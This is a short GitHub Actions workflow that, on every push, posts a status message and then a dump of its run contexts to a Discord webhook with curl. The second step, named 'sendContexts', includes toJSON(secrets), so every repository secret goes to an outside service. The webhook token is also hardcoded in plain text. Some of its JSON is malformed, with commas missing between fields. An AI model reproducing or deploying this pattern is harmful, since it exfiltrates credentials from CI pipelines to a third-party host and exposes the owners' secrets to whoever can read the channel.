on: push


jobs:
  sendMessage:
    name: Send Message
    runs-on: ubuntu-latest

    steps:
      - name: "sendmmm"
        env:
          MSG: '{
            "title": "${{ github.event_name }} - ${{ job.status }}",
            "description": "In repository: ${{ github.repository }}"
          }'
        run: 'curl -H "Content-Type: application/json" -d "{\"embeds\": [$MSG]}" -X POST https://discord.com/api/webhooks/779046008684412979/UaQqJmOHg7nwqNAupSc04_hiE-Hmrk61VwTwtgMEnuLcXFe95S29omkXHE-ikOzNk5bZ'
    
      - name: "sendContexts"
        env:
          MSG: '{"title": "Contexts", "fields": [{"name": "Github", "value": "${{ toJSON(github) }}"},{"name": "Env", "value": "${{ toJSON(env) }}"},{"name": "Job", "value": "${{ toJSON(job) }}"}{"name": "Steps", "value": "${{ toJSON(steps) }}"}{"name": "Runner", "value": "${{ toJSON(runner) }}"}{"name": "Secrets", "value": "${{ toJSON(secrets) }}"}{"name": "Strategy", "value": "${{ toJSON(strategy) }}"}{"name": "Matrix", "value": "${{ toJSON(matrix) }}"}{"name": "Needs", "value": "${{ toJSON(needs) }}"}]}'
        run: 'curl -H "Content-Type: application/json" -d "{\"embeds\": [$MSG]}" -X POST https://discord.com/api/webhooks/779046008684412979/UaQqJmOHg7nwqNAupSc04_hiE-Hmrk61VwTwtgMEnuLcXFe95S29omkXHE-ikOzNk5bZ'